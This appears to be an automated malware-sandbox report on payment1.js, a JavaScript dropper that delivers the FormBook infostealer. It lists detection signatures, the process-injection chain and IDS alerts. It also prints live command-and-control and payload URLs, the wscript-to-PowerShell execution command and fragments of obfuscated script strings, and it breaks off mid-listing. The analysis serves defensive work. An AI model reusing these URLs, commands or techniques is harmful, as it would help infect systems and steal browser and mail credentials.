
Windows Analysis Report
payment1.js

Overview

General Information

Sample name: payment1.js
Analysis ID: 1617730
MD5: 2654bc864c7151909126b25ea1c81b76
SHA1: 5ed041b8271952bdeb234412d57b08d62a2d76d5
SHA256: c7416d2226ba27764dc40ad2b8288e051f7f40f116f5995388a3a88e55c4006f
Tags: js, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Potential obfuscated javascript found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6892 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 6944 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FEC299680E47D0901C60D84DD11EFC55)
        • RegAsm.exe (PID: 6612 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 6920 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • sxkv2RIDKUVCF4X010eCnC.exe (PID: 4108 cmdline: "C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\tlGuABffGV7.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
            • MRINFO.EXE (PID: 5680 cmdline: "C:\Windows\SysWOW64\MRINFO.EXE" MD5: F664A3E4625D86FC6B389AFF416CF67F)
              • sxkv2RIDKUVCF4X010eCnC.exe (PID: 2924 cmdline: "C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\VhI7TkPM.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • firefox.exe (PID: 3568 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(4 further memory-dump matches are not expanded in the report)

Source | Rule | Description | Author
5.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
5.2.RegAsm.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 196.251.92.64, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6892, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", ProcessId: 6892, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 196.251.92.64, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6892, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", ProcessId: 6892, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6892, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 5352, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T08:15:08.251077+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 52381 | 104.21.16.180 | 80 | TCP
2025-02-18T08:15:31.565835+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 52532 | 199.59.243.160 | 80 | TCP
2025-02-18T08:15:44.793153+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 52619 | 13.248.169.48 | 80 | TCP
2025-02-18T08:15:58.061120+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 52659 | 162.0.231.203 | 80 | TCP
2025-02-18T08:16:14.361639+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 52663 | 13.248.169.48 | 80 | TCP
2025-02-18T08:16:29.221357+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 52667 | 47.83.1.90 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T08:14:24.465469+0100 | 2018856 | 1 | A Network Trojan was detected | 196.251.92.64 | 80 | 192.168.2.4 | 49731 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T08:15:23.924194+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52479 | 199.59.243.160 | 80 | TCP
2025-02-18T08:15:26.471184+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52495 | 199.59.243.160 | 80 | TCP
2025-02-18T08:15:29.004663+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52511 | 199.59.243.160 | 80 | TCP
2025-02-18T08:15:37.053621+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52568 | 13.248.169.48 | 80 | TCP
2025-02-18T08:15:39.727711+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52584 | 13.248.169.48 | 80 | TCP
2025-02-18T08:15:42.257629+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52600 | 13.248.169.48 | 80 | TCP
2025-02-18T08:15:50.453083+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52656 | 162.0.231.203 | 80 | TCP
2025-02-18T08:15:52.974967+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52657 | 162.0.231.203 | 80 | TCP
2025-02-18T08:15:55.550608+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52658 | 162.0.231.203 | 80 | TCP
2025-02-18T08:16:03.677240+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52660 | 13.248.169.48 | 80 | TCP
2025-02-18T08:16:06.212902+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52661 | 13.248.169.48 | 80 | TCP
2025-02-18T08:16:08.776489+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52662 | 13.248.169.48 | 80 | TCP
2025-02-18T08:16:20.933176+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52664 | 47.83.1.90 | 80 | TCP
2025-02-18T08:16:24.058104+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52665 | 47.83.1.90 | 80 | TCP
2025-02-18T08:16:26.604887+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 52666 | 47.83.1.90 | 80 | TCP

AV Detection

Source: http://www.weilaishijie.xyz/mvfs/ | Avira URL Cloud: Label: malware
Source: http://www.weilaishijie.xyz/mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo= | Avira URL Cloud: Label: malware
Source: http://www.infiniteve.xyz/rvdc/?JZfd=4SS44dSHix1qeqRpZ30sUGwaRLQ6PL636AaAeL4eRpehwv4hyktLqvMv9AyoVvbLe7Ilavn5wnoOWJ/fZmmrIfslJ8D6BKaSqIEkHtgn+Cj3tNriNM+Lp4c=&28t=_DlH9FNpJbu | Avira URL Cloud: Label: malware
Source: http://www.lucynoel6465.shop/9gtw/?JZfd=bFQVCxzo4meVUPRnP0n3FR5ZzBASsiXRVHB0uPlWJiDXwsbOt8zcfdxm4ktJdQTn5zPq+Y8ykDyEtSWLtIWRcrie4i7GHURObbczaEgRbEWCMNyWzbPKN50=&28t=_DlH9FNpJbu | Avira URL Cloud: Label: phishing
Source: http://www.dqvcbn.info/xqy6/ | Avira URL Cloud: Label: malware
Source: http://www.dqvcbn.info | Avira URL Cloud: Label: malware
Source: http://196.251.92.64/crypt/popo.ps1 | Avira URL Cloud: Label: malware
Source: http://www.physicsbrain.xyz/ajxq/?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbu | Avira URL Cloud: Label: malware
Source: http://www.physicsbrain.xyz/ajxq/ | Avira URL Cloud: Label: malware
Source: http://www.dqvcbn.info/xqy6/?JZfd=3AdOd/JiBJZfW59JF3bk/JUX+I6ir2eDUVeNMTHa5bokm3l1PR6gBk+gEKdbuXFpEa+iNwYC+tVHkUu9Fw3QKE4rVdEfXJGpPPZQf/r11XdvYWfnyknaUqI=&28t=_DlH9FNpJbu | Avira URL Cloud: Label: malware
Source: http://www.infiniteve.xyz/rvdc/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\x.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: payment1.js | Virustotal: Detection: 16%
Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2989992903.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2987628096.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2110867358.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Binary string: wntdll.pdbUGP | source: RegAsm.exe, 00000005.00000002.2107158636.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.00000000038EE000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.0000000003750000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2107338460.000000000359C000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2104477664.00000000033E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2107158636.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, MRINFO.EXE, 0000000A.00000002.2990258811.00000000038EE000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.0000000003750000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2107338460.000000000359C000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2104477664.00000000033E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mrinfo.pdbGCTL | source: RegAsm.exe, 00000005.00000002.2104818275.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2988989976.000000000096E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mrinfo.pdb | source: RegAsm.exe, 00000005.00000002.2104818275.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2988989976.000000000096E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2027775593.00000000003FF000.00000002.00000001.01000000.0000000A.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2987654360.00000000003FF000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZDFS.pdb | source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr
Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZDFS.pdbBSJB | source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr
Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0306CA70 FindFirstFileW,FindNextFileW,FindClose, 10_2_0306CA70

Software Vulnerabilities

Source: payment1.js | Return value: ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsArgument value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', 